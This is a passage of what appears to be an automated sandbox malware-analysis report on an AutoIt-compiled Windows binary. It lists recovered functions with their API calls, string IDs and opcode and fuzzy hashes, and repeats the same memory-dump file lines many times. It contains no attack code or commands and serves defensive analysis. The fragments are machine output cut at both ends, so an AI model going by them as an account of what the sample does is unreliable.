                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend
                                                                                                                              • String ID: '
                                                                                                                              • API String ID: 3850602802-1997036262
                                                                                                                              • Opcode ID: 5b0b1f22ec1b2fb7b621feb2567a890d0b57534b2ceaf1f6bcfd2cb344b936bf
                                                                                                                              • Instruction ID: 11b18b67f1c290ef989d7d1371e7bd81b197c8337a82009aa63e9b5a59976ef5
                                                                                                                              • Opcode Fuzzy Hash: 5b0b1f22ec1b2fb7b621feb2567a890d0b57534b2ceaf1f6bcfd2cb344b936bf
                                                                                                                              • Instruction Fuzzy Hash: F541E575A00209DFDB14CF68D881BDA7BB5BF09300F54456AE909AB381D770E952CFA1
                                                                                                                              Function 001C57D7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 001C57E7
                                                                                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 001C581D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CrackInternet_memset
                                                                                                                              • String ID: |
                                                                                                                              • API String ID: 1413715105-2343686810
                                                                                                                              • Opcode ID: 2f58c6b79741de82eb0ee165352b06ecc2b144c6e28fcc51513dedfef56bc7ba
                                                                                                                              • Instruction ID: ceda4750769c809ae10fd3ab68c578b48ceb926f3fb34c6908d07b0bd45687a6
                                                                                                                              • Opcode Fuzzy Hash: 2f58c6b79741de82eb0ee165352b06ecc2b144c6e28fcc51513dedfef56bc7ba
                                                                                                                              • Instruction Fuzzy Hash: C4311C71C00119EBCF11AFA1DC95EEE7FB9FF28350F108019F919A6162DB319A56DBA0
                                                                                                                              Function 001D9567 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • DestroyWindow.USER32(?,?,?,?), ref: 001D961B
                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 001D9657
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$DestroyMove
                                                                                                                              • String ID: static
                                                                                                                              • API String ID: 2139405536-2160076837
                                                                                                                              • Opcode ID: c5e48d6238540a9cce8223150ad156e8768ffd204d352d401e2135334bcaf9c5
                                                                                                                              • Instruction ID: cf8f43a25b64e388d122a969578365e49de51ef6e487ad597f0b4500bc2eb912
                                                                                                                              • Opcode Fuzzy Hash: c5e48d6238540a9cce8223150ad156e8768ffd204d352d401e2135334bcaf9c5
                                                                                                                              • Instruction Fuzzy Hash: 1931AF31500604AEEB109F64DC81FFB77A9FF58764F10861AF9A9C7290CB31AD91DB64
                                                                                                                              Function 001B5B75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 001B5BE4
                                                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 001B5C1F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InfoItemMenu_memset
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 2223754486-4108050209
                                                                                                                              • Opcode ID: 0408c7746b2858682fceaa342ae9a9c6669f26a3bc5bebf9f749709c35f31a4d
                                                                                                                              • Instruction ID: 0cb7d40b49385b24182a65eaa09e42143888ff94e285d9f75f0501bed0a4b0bc
                                                                                                                              • Opcode Fuzzy Hash: 0408c7746b2858682fceaa342ae9a9c6669f26a3bc5bebf9f749709c35f31a4d
                                                                                                                              • Instruction Fuzzy Hash: 1131A531600709ABEB25CF98D985BEDBFFBEF05354F280019E985971A0D7B09A44CF10
                                                                                                                              Function 001C6B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __snwprintf.LIBCMT ref: 001C6BDD
                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __snwprintf_memmove
                                                                                                                              • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                              • API String ID: 3506404897-2584243854
                                                                                                                              • Opcode ID: 0523708b335c01afd19becc2c852ae05527af67b8d0994590c7f798d008ea8e2
                                                                                                                              • Instruction ID: 65af45e6ccf1072bb361aef257a4c30320d830c6d05ec06e5d47632ad9741494
                                                                                                                              • Opcode Fuzzy Hash: 0523708b335c01afd19becc2c852ae05527af67b8d0994590c7f798d008ea8e2
                                                                                                                              • Instruction Fuzzy Hash: 1B21BD31600218BACF14EFA4C882FAEB7B5EF69700F004469F549AB181DB74EA51DBA5
                                                                                                                              Function 001D91DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 001D9269
                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001D9274
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend
                                                                                                                              • String ID: Combobox
                                                                                                                              • API String ID: 3850602802-2096851135
                                                                                                                              • Opcode ID: 69c4ebc8fe5ed5ff5a9f1e6ad4f2d357f8029b6df98cdee7c4fe8581654632f9
                                                                                                                              • Instruction ID: a44e410dd9359d834fc8295eb5d882f36917320e83966cdf705a7c59c999821e
                                                                                                                              • Opcode Fuzzy Hash: 69c4ebc8fe5ed5ff5a9f1e6ad4f2d357f8029b6df98cdee7c4fe8581654632f9
                                                                                                                              • Instruction Fuzzy Hash: 6D11B671300108BFEF119F54DC80EBB376AEB993A4F104126F9189B390D735DC518BA0
                                                                                                                              Function 001D970B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0018C657
                                                                                                                                • Part of subcall function 0018C619: GetStockObject.GDI32(00000011), ref: 0018C66B
                                                                                                                                • Part of subcall function 0018C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0018C675
                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 001D9775
                                                                                                                              • GetSysColor.USER32(00000012), ref: 001D978F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                              • String ID: static
                                                                                                                              • API String ID: 1983116058-2160076837
                                                                                                                              • Opcode ID: 53520c5bc0eaf326ab019016371817da8d4b1a1036a431f5d5d8187d5774fbdc
                                                                                                                              • Instruction ID: 7976a27a7cdda3d3e8e26fc2ea42de1b5d9eec22d3f38453969bb2505eda1043
                                                                                                                              • Opcode Fuzzy Hash: 53520c5bc0eaf326ab019016371817da8d4b1a1036a431f5d5d8187d5774fbdc
                                                                                                                              • Instruction Fuzzy Hash: 17113A72520209AFDB04DFB8DC45EFA7BB8EB08314F014629F955D3250E735E861DB60
                                                                                                                              Function 001D9424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 001D94A6
                                                                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001D94B5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LengthMessageSendTextWindow
                                                                                                                              • String ID: edit
                                                                                                                              • API String ID: 2978978980-2167791130
                                                                                                                              • Opcode ID: 4445eb073f703d494170282244fd3e0a1bb7e80d3a8caf85e2b57dabbc4a6783
                                                                                                                              • Instruction ID: 65131a2b9295dc800781835350781dda9296075b042672b87bc2b7222684a3e1
                                                                                                                              • Opcode Fuzzy Hash: 4445eb073f703d494170282244fd3e0a1bb7e80d3a8caf85e2b57dabbc4a6783
                                                                                                                              • Instruction Fuzzy Hash: 4C116D71100204AFEB109EA4ED44AFB37AAEB05378F504726F965972E2C775DC529BA0
                                                                                                                              Function 001B5C80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 001B5CF3
                                                                                                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 001B5D12
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InfoItemMenu_memset
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 2223754486-4108050209
                                                                                                                              • Opcode ID: e97e5b3ca9f4e27eb608e917c68b5b2105c657d810867a736c0205f316cac4d1
                                                                                                                              • Instruction ID: 742fdd72363f8a0f8b9544ea5af8148f4f96331952267877042aafe69fb9c7a0
                                                                                                                              • Opcode Fuzzy Hash: e97e5b3ca9f4e27eb608e917c68b5b2105c657d810867a736c0205f316cac4d1
                                                                                                                              • Instruction Fuzzy Hash: A0118272D01618ABDB24EB98EC48BE97BFBAB053A4F190121ED45EB1D0D771AD04C791
                                                                                                                              Function 001C53F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 001C544C
                                                                                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 001C5475
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Internet$OpenOption
                                                                                                                              • String ID: <local>
                                                                                                                              • API String ID: 942729171-4266983199
                                                                                                                              • Opcode ID: 75dd1d5d8d72eb9ffd649ff2ee1238138f8f7c973000780182150399f490dbc8
                                                                                                                              • Instruction ID: ca066fc7f8b896da4a27cc0a273a5e7e319666445f13f874b34f256cb7e2c7a0
                                                                                                                              • Opcode Fuzzy Hash: 75dd1d5d8d72eb9ffd649ff2ee1238138f8f7c973000780182150399f490dbc8
                                                                                                                              • Instruction Fuzzy Hash: D5119E70141A21BADB2D8F518C84FFBFAAAEF22756F10822EF54556040F370A9D0C6B0
                                                                                                                              Function 0019B4BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 001A4557
                                                                                                                              • ___raise_securityfailure.LIBCMT ref: 001A463E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                              • String ID: (#
                                                                                                                              • API String ID: 3761405300-3738616181
                                                                                                                              • Opcode ID: 44d53a8c98564cfa3b733c9d53764fe47557e0485fd8108f6f58f99d2b1511b7
                                                                                                                              • Instruction ID: a18068a328fa146f2cf0addff2d038ce7af05f8f8287b8f4c9a7f86ce8841a64
                                                                                                                              • Opcode Fuzzy Hash: 44d53a8c98564cfa3b733c9d53764fe47557e0485fd8108f6f58f99d2b1511b7
                                                                                                                              • Instruction Fuzzy Hash: 9D21F3B5610208DBD714DF55F9E9A403BE4FB4D310F10586AE9088B7A1E3F5A981CF65
                                                                                                                              Function 001CACD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: htonsinet_addr
                                                                                                                              • String ID: 255.255.255.255
                                                                                                                              • API String ID: 3832099526-2422070025
                                                                                                                              • Opcode ID: fc169e25962804dc856ed7f23d150c2a09105ee45ecc9dbf4f6b78e1d4a9f390
                                                                                                                              • Instruction ID: 6f89ddb3decdcdf5fb190f7ba20a7a4d1e8998800dff5735639a2960695d32e2
                                                                                                                              • Opcode Fuzzy Hash: fc169e25962804dc856ed7f23d150c2a09105ee45ecc9dbf4f6b78e1d4a9f390
                                                                                                                              • Instruction Fuzzy Hash: F6012234200309ABCB11AFA4D842FFDB364FF24728F20851AF5169B6C1D771E800C751
                                                                                                                              Function 001AC577 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 001AC5E5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend_memmove
                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                              • API String ID: 1456604079-1403004172
                                                                                                                              • Opcode ID: d538adfb4bc9a3e4231290263eeb0a87d33e229765a699e3c82908fbbcedb8ea
                                                                                                                              • Instruction ID: 2a5a7932a645ba978bc2a153fead51fe43958167964732a5cdc606693eff9a93
                                                                                                                              • Opcode Fuzzy Hash: d538adfb4bc9a3e4231290263eeb0a87d33e229765a699e3c82908fbbcedb8ea
                                                                                                                              • Instruction Fuzzy Hash: DF01F575601218ABCB08EBA8CC529FE33AAAF17310B144618F422E72C1DB3068088790
                                                                                                                              Function 001BC4D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __fread_nolock_memmove
                                                                                                                              • String ID: EA06
                                                                                                                              • API String ID: 1988441806-3962188686
                                                                                                                              • Opcode ID: 3559a99bd91336dece1a8499f220aa511c82e4d52d66451040f8275962b3eb18
                                                                                                                              • Instruction ID: 7b925e893a3a08ac07f4208cb3544d22490abd815b2e6a5297dfbe93167b9641
                                                                                                                              • Opcode Fuzzy Hash: 3559a99bd91336dece1a8499f220aa511c82e4d52d66451040f8275962b3eb18
                                                                                                                              • Instruction Fuzzy Hash: AA01F5729002187FDB28D7A8C856EFE7BF89B15311F00415AE193D2181E6B4A7088B60
                                                                                                                              Function 001AC473 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
